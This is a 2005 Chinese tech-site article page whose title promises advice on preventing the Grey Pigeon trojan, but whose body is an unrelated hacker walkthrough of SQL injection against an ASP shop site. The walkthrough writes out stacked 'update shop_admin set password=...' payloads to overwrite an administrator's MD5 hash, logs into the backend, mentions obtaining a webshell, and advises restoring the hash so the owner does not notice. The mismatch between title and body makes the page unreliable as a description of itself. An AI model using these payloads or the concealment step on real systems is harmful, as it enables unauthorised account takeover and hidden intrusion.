论坛登陆 注册 文章专区 投稿文章 旧版浏览
首页 | 页界资讯 | 安全动态 | 网络应用 | 组网技术 | 软件应用 | 工具软件 | 网管知识 | 帮助
文学 | 操作系统 | 注 册 表 | 编程语言 | 数 据 库 | 服 务 器 | 网页设计 | 图形图象 | VIP
论坛 | 网络安全 | 安全防范 | 黑客技术 | 硬件学堂 | 路由技术 | 搜索研究 | 站长经验 | 投稿
专题 | 教育频道 | 特色专题 | 精文荟萃 | 聊天通讯 | 网络文学 | 书籍下载 | 广告服务 | 旧版
设为首页 加入收藏
当前位置:首页>>文章>>网络安全>>安全防范>>正文

怎样防止被植入灰鸽子木马

Www.Xker.Com 作者:未知 来源:www.hackbase.com 加入日期:2005-11-4 10:09:49
注入点已经找到:http://xxx.com/book.asp?id=1996 
我刚已经用NB检测过了。可以看到,存在表段 shop_admin。 
可是密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c 
我们来尝试欺骗。可以看出,欺骗是没戏滴。 
那咋办?难道要跑密码?那得浪费多少时间和内存啊? 
下面我来介绍一种新方法:注射。注射的语句如下: 
;update shop_admin set password=’新MD5加密密码’ where password=’d4716077c2ba075c’-- 
比如,我需要把zhuyaod的密码改成wmmhacker,我们首先要先获得wmmhacker通过MD5加密后的十二 

位密码 
这里用明小子的工具就能转换了。wmmhacker - f8dc763194f29433 
;update shop_admin set password=’f8dc763194f29433’ where password=’d4716077c2ba075c’-- 
我们来测试。看见了,页面没有返回错误,表示成功了。 
现在我们对shop_admin表段下的密码做重新解猜。 
[adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433 
大家对比一下,已经改变了。现在我们可以登陆了。 
进来了。呵呵。就到这里了吧。值得提一句的是,我们进了后台,然后想办法拿到WEBSHELL。 
接着,别忘了把管理员密码还原。不然他会发现滴! 
;update shop_admin set password=’d4716077c2ba075c’ where password=’f8dc763194f29433’--

上一篇:拒绝服务攻击原理及解决方法
下一篇:没有了
关闭窗口】【浏览次数:】【发送给好友】【收藏此页
相关文章 最新文章 热门文章

·怎样防止被植入灰鸽子木马 
·JSP中实现全文检索
·JSP与XML的结合
·win2k下搭建jsp环境
·缓冲技术提高JSP程序的性能和稳定性
·小窗口大学问--玩转弹出窗口(4)
·小窗口大学问--玩转弹出窗口(3)
·小窗口大学问--玩转弹出窗口(2)
·小窗口大学问--玩转弹出窗口(1)
·JSP编程进度条设计实例(5)
·DMA让你的硬盘速度飞起来
·怎样查找对方的IP地址
·让你的网速快到不可思议
·电脑初学者必备之Windows进程大全
·2005年度主流聊天工具横评
·黑客入侵论坛各种手段大暴光 
·互联网的巨大威胁 ICMP洪水攻击浅析
·引起系统自动重启的几大原因解析
·自己动手 让组装机也来一键恢复
·SATA硬盘分区设置与安装详解
评论 本站声明
会员名称:
 密码:匿名 ·注册·忘记密码?
评论内容:
(最多300个字符)
  查看评论
【注】 发表评论必需遵守以下条例:
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
  • 本站大部分为网络转载,如有版权问题,请通知我们,我们立即更正!
设为首页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接
Copyright © 2003-2005 xker.com All rights reserved. 网站合作、广告联系QQ:12231446
小新技术网 冀ICP备05002857号